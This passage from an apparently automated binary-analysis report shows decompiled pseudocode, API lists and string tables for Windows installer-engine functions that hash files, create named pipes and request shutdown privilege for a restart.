                                                                                                                                                                  							_t133 =  >=  ? 0x80004005 : _t145;
                                                                                                                                                                  							_push(_t133);
                                                                                                                                                                  							_push(0x676);
                                                                                                                                                                  							L8:
                                                                                                                                                                  							_push("cache.cpp");
                                                                                                                                                                  							E004300D9(_t107);
                                                                                                                                                                  							_push("Failed to get file hash.");
                                                                                                                                                                  							goto L20;
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_push("Failed to allocate memory");
                                                                                                                                                                  					L20:
                                                                                                                                                                  					_push(_t133);
                                                                                                                                                                  					E00430A57();
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v32 != 0) {
                                                                                                                                                                  					E004380AB(_v32);
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v36 != 0) {
                                                                                                                                                                  					E004380AB(_v36);
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_t127 != 0) {
                                                                                                                                                                  					E00431137(_t127);
                                                                                                                                                                  				}
                                                                                                                                                                  				return L004267AF(_t133, _v8 ^ _t146, _t127, _t133);
                                                                                                                                                                  			}



















































                                                                                                                                                                  0x00412de0
                                                                                                                                                                  0x00412de5
                                                                                                                                                                  0x00412de5
                                                                                                                                                                  0x00412dec
                                                                                                                                                                  0x00412def
                                                                                                                                                                  0x00412def
                                                                                                                                                                  0x00412e04

                                                                                                                                                                  APIs
                                                                                                                                                                  • CryptCATAdminCalcHashFromFileHandle.WINTRUST(000007D0,000007D0,00000000,00000000,?,00000000,00000000,00000003,00000000,00000000), ref: 00412BFF
                                                                                                                                                                  • GetLastError.KERNEL32(000007D0,000007D0,00000000,00000000,?,00000000,00000000,00000003,00000000,00000000), ref: 00412C0A
                                                                                                                                                                  • CryptCATAdminCalcHashFromFileHandle.WINTRUST(000007D0,000007D0,00000000,00000000,000007D0,00000001), ref: 00412C25
                                                                                                                                                                  • GetLastError.KERNEL32(000007D0,000007D0,00000000,00000000,000007D0,00000001), ref: 00412C2E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AdminCalcCryptErrorFileFromHandleHashLast
                                                                                                                                                                  • String ID: $$0$Could not close verify handle.$Could not verify file %ls.$Failed to allocate memory$Failed to allocate string.$Failed to encode file hash.$Failed to get file hash.$cache.cpp
                                                                                                                                                                  • API String ID: 2433594094-4263581490
                                                                                                                                                                  • Opcode ID: 8f7b2866a2056cef0eb373a148e026b8abf4646c6de004e37705dfb57d6c35e7
                                                                                                                                                                  • Instruction ID: 7662544fa8d86295eb8ed34580d66d2f83e53cc602963cb2d14e9e8cc6da36ad
                                                                                                                                                                  • Opcode Fuzzy Hash: 8f7b2866a2056cef0eb373a148e026b8abf4646c6de004e37705dfb57d6c35e7
                                                                                                                                                                  • Instruction Fuzzy Hash: 0A715072D00229AFDB11DBA5DD41BEEB6F8AF08710F11012BF900F7291E77899458BA9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 37%
                                                                                                                                                                  			E0040F31A(intOrPtr* _a4, intOrPtr _a8, signed int* _a12) {
                                                                                                                                                                  				long _v8;
                                                                                                                                                                  				long _v12;
                                                                                                                                                                  				signed int _v16;
                                                                                                                                                                  				long _v20;
                                                                                                                                                                  				long _v24;
                                                                                                                                                                  				char _v28;
                                                                                                                                                                  				void* _t37;
                                                                                                                                                                  				signed short _t45;
                                                                                                                                                                  				signed short _t50;
                                                                                                                                                                  				void** _t54;
                                                                                                                                                                  				signed short _t56;
                                                                                                                                                                  				void* _t61;
                                                                                                                                                                  				intOrPtr* _t66;
                                                                                                                                                                  				void* _t67;
                                                                                                                                                                  
                                                                                                                                                                  				_v16 = _v16 | 0xffffffff;
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				if(_a8 != 0) {
                                                                                                                                                                  					L4:
                                                                                                                                                                  					_t66 = _a4;
                                                                                                                                                                  					_t67 = E00433CEA( &_v8, L"\\\\.\\pipe\\%ls",  *_t66);
                                                                                                                                                                  					if(_t67 >= 0) {
                                                                                                                                                                  						_t34 =  ==  ? 0 :  &_v28;
                                                                                                                                                                  						_t61 = CreateNamedPipeW(_v8, 0x80003, 0, 1, 0x10000, 0x10000, 1,  ==  ? 0 :  &_v28);
                                                                                                                                                                  						if(_t61 != 0xffffffff) {
                                                                                                                                                                  							if(_a8 == 0) {
                                                                                                                                                                  								_t37 = _v16;
                                                                                                                                                                  								goto L16;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_t67 = E00433CEA( &_v8, L"\\\\.\\pipe\\%ls.Cache",  *_t66);
                                                                                                                                                                  								if(_t67 >= 0) {
                                                                                                                                                                  									_t37 = CreateNamedPipeW(_v8, 0x80003, 0, 1, 0x10000, 0x10000, 1, 0);
                                                                                                                                                                  									if(_t37 != 0xffffffff) {
                                                                                                                                                                  										L16:
                                                                                                                                                                  										 *(_t66 + 0x14) = _t37;
                                                                                                                                                                  										 *(_t66 + 0x10) = _t61;
                                                                                                                                                                  										 *_a12 =  *_a12 & 0x00000000;
                                                                                                                                                                  									} else {
                                                                                                                                                                  										_t45 = GetLastError();
                                                                                                                                                                  										_t70 =  <=  ? _t45 : _t45 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  										_t67 =  >=  ? 0x80004005 :  <=  ? _t45 : _t45 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  										E004300D9(0x80004005, "pipe.cpp", 0x13d, _t67);
                                                                                                                                                                  										_push(_v8);
                                                                                                                                                                  										_push("Failed to create pipe: %ls");
                                                                                                                                                                  										goto L14;
                                                                                                                                                                  									}
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_push( *_t66);
                                                                                                                                                                  									_push("Failed to allocate full name of cache pipe: %ls");
                                                                                                                                                                  									L14:
                                                                                                                                                                  									_push(_t67);
                                                                                                                                                                  									E00430A57();
                                                                                                                                                                  									CloseHandle(_t61);
                                                                                                                                                                  								}
                                                                                                                                                                  							}
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_t50 = GetLastError();
                                                                                                                                                                  							_t73 =  <=  ? _t50 : _t50 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  							_t67 =  >=  ? 0x80004005 :  <=  ? _t50 : _t50 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  							E004300D9(0x80004005, "pipe.cpp", 0x131, _t67);
                                                                                                                                                                  							_push(_v8);
                                                                                                                                                                  							_push("Failed to create pipe: %ls");
                                                                                                                                                                  							goto L6;
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_push( *_t66);
                                                                                                                                                                  						_push("Failed to allocate full name of pipe: %ls");
                                                                                                                                                                  						L6:
                                                                                                                                                                  						_push(_t67);
                                                                                                                                                                  						E00430A57();
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_push(0);
                                                                                                                                                                  					_t54 =  &_v12;
                                                                                                                                                                  					_push(_t54);
                                                                                                                                                                  					_push(1);
                                                                                                                                                                  					_push(L"D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD)");
                                                                                                                                                                  					L00426628();
                                                                                                                                                                  					if(_t54 != 0) {
                                                                                                                                                                  						_v28 = 0xc;
                                                                                                                                                                  						_v24 = _v12;
                                                                                                                                                                  						_v20 = 0;
                                                                                                                                                                  						goto L4;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t56 = GetLastError();
                                                                                                                                                                  						_t76 =  <=  ? _t56 : _t56 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						_t67 =  >=  ? 0x80004005 :  <=  ? _t56 : _t56 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						E004300D9(0x80004005, "pipe.cpp", 0x121, _t67);
                                                                                                                                                                  						_push("Failed to create the security descriptor for the connection event and pipe.");
                                                                                                                                                                  						_push(_t67);
                                                                                                                                                                  						E00430A57();
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v8 != 0) {
                                                                                                                                                                  					E004380AB(_v8);
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v12 != 0) {
                                                                                                                                                                  					LocalFree(_v12);
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t67;
                                                                                                                                                                  			}

















                                                                                                                                                                  0x0040f496
                                                                                                                                                                  0x0040f4a0
                                                                                                                                                                  0x0040f4ae
                                                                                                                                                                  0x0040f4b3
                                                                                                                                                                  0x0040f4b6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040f4b6
                                                                                                                                                                  0x0040f45a
                                                                                                                                                                  0x0040f45a
                                                                                                                                                                  0x0040f45c
                                                                                                                                                                  0x0040f4bb
                                                                                                                                                                  0x0040f4bb
                                                                                                                                                                  0x0040f4bc
                                                                                                                                                                  0x0040f4c5
                                                                                                                                                                  0x0040f4c5
                                                                                                                                                                  0x0040f458
                                                                                                                                                                  0x0040f3ff
                                                                                                                                                                  0x0040f3ff
                                                                                                                                                                  0x0040f410
                                                                                                                                                                  0x0040f41a
                                                                                                                                                                  0x0040f428
                                                                                                                                                                  0x0040f42d
                                                                                                                                                                  0x0040f430
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040f430
                                                                                                                                                                  0x0040f3bd
                                                                                                                                                                  0x0040f3bd
                                                                                                                                                                  0x0040f3bf
                                                                                                                                                                  0x0040f3c4
                                                                                                                                                                  0x0040f3c4
                                                                                                                                                                  0x0040f3c5
                                                                                                                                                                  0x0040f3ca
                                                                                                                                                                  0x0040f33c
                                                                                                                                                                  0x0040f33c
                                                                                                                                                                  0x0040f33d
                                                                                                                                                                  0x0040f340
                                                                                                                                                                  0x0040f341
                                                                                                                                                                  0x0040f343
                                                                                                                                                                  0x0040f348
                                                                                                                                                                  0x0040f34f
                                                                                                                                                                  0x0040f394
                                                                                                                                                                  0x0040f39b
                                                                                                                                                                  0x0040f39e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040f351
                                                                                                                                                                  0x0040f351
                                                                                                                                                                  0x0040f362
                                                                                                                                                                  0x0040f36c
                                                                                                                                                                  0x0040f37a
                                                                                                                                                                  0x0040f37f
                                                                                                                                                                  0x0040f384
                                                                                                                                                                  0x0040f385
                                                                                                                                                                  0x0040f38b
                                                                                                                                                                  0x0040f34f
                                                                                                                                                                  0x0040f4e0
                                                                                                                                                                  0x0040f4e5
                                                                                                                                                                  0x0040f4e5
                                                                                                                                                                  0x0040f4ee
                                                                                                                                                                  0x0040f4f3
                                                                                                                                                                  0x0040f4f3
                                                                                                                                                                  0x0040f4ff

                                                                                                                                                                  APIs
                                                                                                                                                                  • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD),00000001,00000000,00000000), ref: 0040F348
                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,0000046C,00000000,8BE275C0), ref: 0040F351
                                                                                                                                                                  • CreateNamedPipeW.KERNEL32(000000FF,00080003,00000000,00000001,00010000,00010000,00000001,00000000,00000000,00000000,0000046C,00000000,8BE275C0), ref: 0040F3F2
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040F3FF
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,pipe.cpp,0000013D,00000000), ref: 0040F4C5
                                                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 0040F4F3
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to allocate full name of pipe: %ls, xrefs: 0040F3BF
                                                                                                                                                                  • \\.\pipe\%ls, xrefs: 0040F3A9
                                                                                                                                                                  • Failed to create the security descriptor for the connection event and pipe., xrefs: 0040F37F
                                                                                                                                                                  • Failed to allocate full name of cache pipe: %ls, xrefs: 0040F45C
                                                                                                                                                                  • D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD), xrefs: 0040F343
                                                                                                                                                                  • \\.\pipe\%ls.Cache, xrefs: 0040F446
                                                                                                                                                                  • Failed to create pipe: %ls, xrefs: 0040F430, 0040F4B6
                                                                                                                                                                  • pipe.cpp, xrefs: 0040F375, 0040F423, 0040F4A9
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DescriptorErrorLastSecurity$CloseConvertCreateFreeHandleLocalNamedPipeString
                                                                                                                                                                  • String ID: D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD)$Failed to allocate full name of cache pipe: %ls$Failed to allocate full name of pipe: %ls$Failed to create pipe: %ls$Failed to create the security descriptor for the connection event and pipe.$\\.\pipe\%ls$\\.\pipe\%ls.Cache$pipe.cpp
                                                                                                                                                                  • API String ID: 3065245045-3253666091
                                                                                                                                                                  • Opcode ID: ee05c8cebe0db99337df20d0425fab9e359106f373ba488633c3cb07a3529b7d
                                                                                                                                                                  • Instruction ID: dc95f27b805f7c3a9a776c920ead732d8815f9aa21f80d8eb90c058fd0cb55ad
                                                                                                                                                                  • Opcode Fuzzy Hash: ee05c8cebe0db99337df20d0425fab9e359106f373ba488633c3cb07a3529b7d
                                                                                                                                                                  • Instruction Fuzzy Hash: C951A271E40214BBEB219AA59D46BAFB6A4EF04715F20023BFE00F61D0D3B94A449A98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 42%
                                                                                                                                                                  			E004011BF(void* __edx) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                  				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                  				void* _v28;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				signed int _t13;
                                                                                                                                                                  				int _t24;
                                                                                                                                                                  				signed short _t31;
                                                                                                                                                                  				signed short _t34;
                                                                                                                                                                  				signed short _t37;
                                                                                                                                                                  				int _t47;
                                                                                                                                                                  				int _t48;
                                                                                                                                                                  				signed int _t60;
                                                                                                                                                                  
                                                                                                                                                                  				_t13 =  *0x4560d0; // 0xae480e18
                                                                                                                                                                  				_v8 = _t13 ^ _t60;
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				_v28 = 0;
                                                                                                                                                                  				_t47 = 0;
                                                                                                                                                                  				if(OpenProcessToken(GetCurrentProcess(), 0x20,  &_v28) != 0) {
                                                                                                                                                                  					_v24.PrivilegeCount = 1;
                                                                                                                                                                  					_v12 = 2;
                                                                                                                                                                  					if(LookupPrivilegeValueW(0, L"SeShutdownPrivilege",  &(_v24.Privileges)) != 0) {
                                                                                                                                                                  						if(AdjustTokenPrivileges(_v28, 0,  &_v24, 0x10, 0, 0) != 0) {
                                                                                                                                                                  							do {
                                                                                                                                                                  								_t48 = 0;
                                                                                                                                                                  								Sleep(0x3e8);
                                                                                                                                                                  								_push(0x80040002);
                                                                                                                                                                  								_push(1);
                                                                                                                                                                  								_push(0);
                                                                                                                                                                  								_push(0);
                                                                                                                                                                  								_push(0);
                                                                                                                                                                  								_push(0);
                                                                                                                                                                  								if( *0x456f4c() == 0) {
                                                                                                                                                                  									_t48 =  <=  ? GetLastError() : _t30 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  								}
                                                                                                                                                                  								_t24 = _t47;
                                                                                                                                                                  								_t47 = _t47 + 1;
                                                                                                                                                                  							} while (_t24 < 0xa && (_t48 == 0x800704f7 || _t48 == 0x80070015));
                                                                                                                                                                  							if(_t48 < 0) {
                                                                                                                                                                  								E004300D9(_t24, "engine.cpp", 0x2f3, _t48);
                                                                                                                                                                  								_push("Failed to schedule restart.");
                                                                                                                                                                  								goto L13;
                                                                                                                                                                  							}
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_t31 = GetLastError();
                                                                                                                                                                  							_t53 =  <=  ? _t31 : _t31 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  							_t48 =  >=  ? 0x80004005 :  <=  ? _t31 : _t31 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  							E004300D9(0x80004005, "engine.cpp", 0x2df, _t48);
                                                                                                                                                                  							_push("Failed to adjust token to add shutdown privileges.");
                                                                                                                                                                  							goto L13;
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t34 = GetLastError();
                                                                                                                                                                  						_t56 =  <=  ? _t34 : _t34 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						_t48 =  >=  ? 0x80004005 :  <=  ? _t34 : _t34 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						E004300D9(0x80004005, "engine.cpp", 0x2da, _t48);
                                                                                                                                                                  						_push("Failed to get shutdown privilege LUID.");
                                                                                                                                                                  						goto L13;
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t37 = GetLastError();
                                                                                                                                                                  					_t59 =  <=  ? _t37 : _t37 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  					_t48 =  >=  ? 0x80004005 :  <=  ? _t37 : _t37 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  					E004300D9(0x80004005, "engine.cpp", 0x2d3, _t48);
                                                                                                                                                                  					_push("Failed to get process token.");
                                                                                                                                                                  					L13:
                                                                                                                                                                  					_push(_t48);
                                                                                                                                                                  					E00430A57();
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v28 != 0) {
                                                                                                                                                                  					CloseHandle(_v28);
                                                                                                                                                                  				}
                                                                                                                                                                  				return L004267AF(_t48, _v8 ^ _t60, _t47, _t48);
                                                                                                                                                                  			}


















                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000020,?,?,00000000,?,?,?,?,?,?,?), ref: 004011E8
                                                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 004011EF
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 004011F9
                                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32 ref: 00401249
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00401253
                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040134D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastProcess$CloseCurrentHandleLookupOpenPrivilegeTokenValue
                                                                                                                                                                  • String ID: Failed to adjust token to add shutdown privileges.$Failed to get process token.$Failed to get shutdown privilege LUID.$Failed to schedule restart.$SeShutdownPrivilege$engine.cpp
                                                                                                                                                                  • API String ID: 4232854991-1583736410
                                                                                                                                                                  • Opcode ID: 43074383a428bbc5c8e60fa1ee0ceaf5a9b694cd136d8fb73782ec4095ae8277
                                                                                                                                                                  • Instruction ID: 136e48f9ad1cdbcf1ab916fb6b19b59be18224ef9a29a49cf331480ed5284ed9
                                                                                                                                                                  • Opcode Fuzzy Hash: 43074383a428bbc5c8e60fa1ee0ceaf5a9b694cd136d8fb73782ec4095ae8277
                                                                                                                                                                  • Instruction Fuzzy Hash: D8415332A40625AAE7109BA59C49BAB75E8EB08755F11113AFE01FA1A0D7798C0046ED
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 46%
                                                                                                                                                                  			E0043821C(void* __ecx, void* __edx, void* __eflags, void* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char _a20, long _a24) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				void _v4104;
                                                                                                                                                                  				char _v4108;
                                                                                                                                                                  				long _v4112;
                                                                                                                                                                  				long _v4116;
                                                                                                                                                                  				intOrPtr _v4120;
                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				signed int _t31;
                                                                                                                                                                  				long** _t37;
                                                                                                                                                                  				signed short _t38;
                                                                                                                                                                  				signed short _t41;
                                                                                                                                                                  				signed short _t42;
                                                                                                                                                                  				signed short _t46;
                                                                                                                                                                  				signed short _t47;
                                                                                                                                                                  				void* _t48;
                                                                                                                                                                  				signed short _t50;
                                                                                                                                                                  				signed short _t51;
                                                                                                                                                                  				signed short _t52;
                                                                                                                                                                  				signed short _t53;
                                                                                                                                                                  				signed short _t54;
                                                                                                                                                                  				signed short _t55;
                                                                                                                                                                  				long _t56;
                                                                                                                                                                  				void* _t61;
                                                                                                                                                                  				signed short _t65;
                                                                                                                                                                  				signed short _t68;
                                                                                                                                                                  				signed short _t71;
                                                                                                                                                                  				signed short _t74;
                                                                                                                                                                  				signed short _t77;
                                                                                                                                                                  				signed int _t81;
                                                                                                                                                                  				void* _t84;
                                                                                                                                                                  
                                                                                                                                                                  				_t84 = __eflags;
                                                                                                                                                                  				E0042F730(0x1014);
                                                                                                                                                                  				_t31 =  *0x4560d0; // 0xae480e18
                                                                                                                                                                  				_v8 = _t31 ^ _t81;
                                                                                                                                                                  				_t56 = _a24;
                                                                                                                                                                  				_t61 = _a4;
                                                                                                                                                                  				_v4120 = _a16;
                                                                                                                                                                  				_t62 = 0;
                                                                                                                                                                  				_v4112 = 0;
                                                                                                                                                                  				_v4108 = 0;
                                                                                                                                                                  				_v4116 = 0;
                                                                                                                                                                  				E004267C0(_t56, __ecx, _t61, 0, _t84);
                                                                                                                                                                  				_t37 =  &_v4112;
                                                                                                                                                                  				__imp__CryptAcquireContextW(_t37, 0, 0, _a8, 0xf0000040,  &_v4104, 0, 0x1000);
                                                                                                                                                                  				if(_t37 != 0) {
                                                                                                                                                                  					_t38 =  &_v4108;
                                                                                                                                                                  					__imp__CryptCreateHash(_v4112, _a12, 0, 0, _t38);
                                                                                                                                                                  					__eflags = _t38;
                                                                                                                                                                  					if(_t38 != 0) {
                                                                                                                                                                  						while(1) {
                                                                                                                                                                  							_t41 = ReadFile(_t61,  &_v4104, 0x1000,  &_v4116, 0);
                                                                                                                                                                  							__eflags = _t41;
                                                                                                                                                                  							if(_t41 == 0) {
                                                                                                                                                                  								break;
                                                                                                                                                                  							}
                                                                                                                                                                  							_push(0);
                                                                                                                                                                  							__eflags = _v4116 - _t62;
                                                                                                                                                                  							if(_v4116 == _t62) {
                                                                                                                                                                  								_t42 =  &_a20;
                                                                                                                                                                  								__imp__CryptGetHashParam(_v4108, 2, _v4120, _t42);
                                                                                                                                                                  								__eflags = _t42;
                                                                                                                                                                  								if(_t42 != 0) {
                                                                                                                                                                  									__eflags = _t56;
                                                                                                                                                                  									if(_t56 != 0) {
                                                                                                                                                                  										_push(1);
                                                                                                                                                                  										_t46 = SetFilePointerEx(_t61, 0, 0, _t56);
                                                                                                                                                                  										__eflags = _t46;
                                                                                                                                                                  										if(_t46 == 0) {
                                                                                                                                                                  											_t47 = GetLastError();
                                                                                                                                                                  											__eflags = _t47;
                                                                                                                                                                  											_t65 =  <=  ? _t47 : _t47 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  											_t48 = 0x80004005;
                                                                                                                                                                  											__eflags = _t65;
                                                                                                                                                                  											_t62 =  >=  ? 0x80004005 : _t65;
                                                                                                                                                                  											_push( >=  ? 0x80004005 : _t65);
                                                                                                                                                                  											_push(0xbb);
                                                                                                                                                                  											goto L8;
                                                                                                                                                                  										}
                                                                                                                                                                  									}
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_t50 = GetLastError();
                                                                                                                                                                  									__eflags = _t50;
                                                                                                                                                                  									_t68 =  <=  ? _t50 : _t50 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  									_t48 = 0x80004005;
                                                                                                                                                                  									__eflags = _t68;
                                                                                                                                                                  									_t62 =  >=  ? 0x80004005 : _t68;
                                                                                                                                                                  									_push( >=  ? 0x80004005 : _t68);
                                                                                                                                                                  									_push(0xb4);
                                                                                                                                                                  									goto L8;
                                                                                                                                                                  								}
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_t51 =  &_v4104;
                                                                                                                                                                  								__imp__CryptHashData(_v4108, _t51, _v4116);
                                                                                                                                                                  								__eflags = _t51;
                                                                                                                                                                  								if(_t51 == 0) {
                                                                                                                                                                  									_t52 = GetLastError();
                                                                                                                                                                  									__eflags = _t52;
                                                                                                                                                                  									_t71 =  <=  ? _t52 : _t52 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  									_t48 = 0x80004005;
                                                                                                                                                                  									__eflags = _t71;
                                                                                                                                                                  									_t62 =  >=  ? 0x80004005 : _t71;
                                                                                                                                                                  									_push( >=  ? 0x80004005 : _t71);
                                                                                                                                                                  									_push(0xad);
                                                                                                                                                                  									goto L8;
                                                                                                                                                                  								} else {
                                                                                                                                                                  									continue;
                                                                                                                                                                  								}
                                                                                                                                                                  							}
                                                                                                                                                                  							goto L9;
                                                                                                                                                                  						}
                                                                                                                                                                  						_t53 = GetLastError();
                                                                                                                                                                  						__eflags = _t53;
                                                                                                                                                                  						_t74 =  <=  ? _t53 : _t53 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						_t48 = 0x80004005;
                                                                                                                                                                  						__eflags = _t74;
                                                                                                                                                                  						_t62 =  >=  ? 0x80004005 : _t74;
                                                                                                                                                                  						_push( >=  ? 0x80004005 : _t74);
                                                                                                                                                                  						_push(0xa2);
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t54 = GetLastError();
                                                                                                                                                                  						__eflags = _t54;
                                                                                                                                                                  						_t77 =  <=  ? _t54 : _t54 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						_t48 = 0x80004005;
                                                                                                                                                                  						__eflags = _t77;
                                                                                                                                                                  						_t62 =  >=  ? 0x80004005 : _t77;
                                                                                                                                                                  						_push( >=  ? 0x80004005 : _t77);
                                                                                                                                                                  						_push(0x9a);
                                                                                                                                                                  					}
                                                                                                                                                                  					goto L8;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t55 = GetLastError();
                                                                                                                                                                  					_t80 =  <=  ? _t55 : _t55 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  					_t48 = 0x80004005;
                                                                                                                                                                  					_t62 =  >=  ? 0x80004005 :  <=  ? _t55 : _t55 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  					_push( >=  ? 0x80004005 :  <=  ? _t55 : _t55 & 0x0000ffff | 0x80070000);
                                                                                                                                                                  					_push(0x94);
                                                                                                                                                                  					L8:
                                                                                                                                                                  					_push("cryputil.cpp");
                                                                                                                                                                  					E004300D9(_t48);
                                                                                                                                                                  				}
                                                                                                                                                                  				L9:
                                                                                                                                                                  				if(_v4108 != 0) {
                                                                                                                                                                  					__imp__CryptDestroyHash(_v4108);
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v4112 != 0) {
                                                                                                                                                                  					CryptReleaseContext(_v4112, 0);
                                                                                                                                                                  				}
                                                                                                                                                                  				return L004267AF(_t62, _v8 ^ _t81, _t61, _t62);
                                                                                                                                                                  			}

                                                                                                                                                                  0x004382eb
                                                                                                                                                                  0x004382ed
                                                                                                                                                                  0x004382f0
                                                                                                                                                                  0x004382f1
                                                                                                                                                                  0x004382f1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0043828b
                                                                                                                                                                  0x0043828b
